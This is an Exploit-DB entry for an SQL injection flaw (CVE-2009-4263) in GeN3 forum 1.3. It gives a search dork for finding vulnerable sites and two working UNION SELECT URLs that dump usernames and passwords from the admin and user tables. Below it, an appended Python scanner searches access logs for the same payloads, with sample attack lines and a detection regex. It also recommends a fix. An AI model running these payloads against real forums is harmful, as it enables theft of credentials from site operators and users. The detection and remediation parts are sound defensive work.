- 34,644
- 0
- 18 Dec 2022
- EDB-ID
- 10299
- EDB Verified
-
- Passed
- Author
- DR.0RYX & CR3W-DZ
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- CVE-2009-4263
- Publication date
- 2009-12-04
Code:
# Author: Dr.0rYX & Cr3w-DZ
# Software Link: http://www.ptcpay.com/shop/browse_products.php
###############################
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] GeN3 forum V1.3 SQL injection vulnerability
[!] Author : Dr.0rYX & Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.ptcpay.com
[+] script : GeN3 Version 1.3
[+] Download : http://www.ptcpay.com/shop/browse_products.php
[+] Version() : 1.3
[+] Vulnerability : SQL injection
[+] Dork :inurl:"main_forum.php?cat="
**************************************************************************/
[ Vulnerable File ]
http://server/path/main_forum.php?cat=[N.A.S.T ]
[ Exploit ]
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users--
[ GReet ]
[+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS
- Source
- www.exploit-db.com
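
A defensive check for the request pattern in the advisory above, as an added example that is not part of the original post or the vendor's code: it scans web-server access logs for `main_forum.php` requests whose `cat` value is not a plain number. It assumes `cat` is meant to be a numeric category id and that the log is in combined-log style; the sample lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2009:10:00:01 +0000] "GET /forum/main_forum.php?cat=3 HTTP/1.1" 200 5120
203.0.113.9 - - [04/Dec/2009:10:00:07 +0000] "GET /forum/main_forum.php?cat=-1+Union+ALL+Select+1,2,3,4,5,6,7+FROM+admins-- HTTP/1.1" 200 812
203.0.113.9 - - [04/Dec/2009:10:00:09 +0000] "GET /forum/main_forum.php?cat=%2d1%20uNiOn%20select%201 HTTP/1.1" 200 640
198.51.100.7 - - [04/Dec/2009:10:02:00 +0000] "GET /forum/main_forum.php?cat=7%27 HTTP/1.1" 500 90
198.51.100.4 - - [04/Dec/2009:10:03:00 +0000] "GET /forum/index.php?cat=abc HTTP/1.1" 200 100
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"union\s+(?:all\s+)?select", re.IGNORECASE)


def classify(value):
    """Return None for a plain numeric id, else a verdict for the decoded value."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    return "union-select" if UNION_SELECT.search(value) else "non-numeric"


def scan(log_text, script="/main_forum.php", param="cat"):
    """Return (client, verdict, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs percent-decodes and turns '+' into a space, so encoded
        # variants of the same payload are compared in one normal form.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value!r}")
```

Log review only shows attempts; the fix belongs in the application, by casting `cat` to an integer or binding it in a parameterized query.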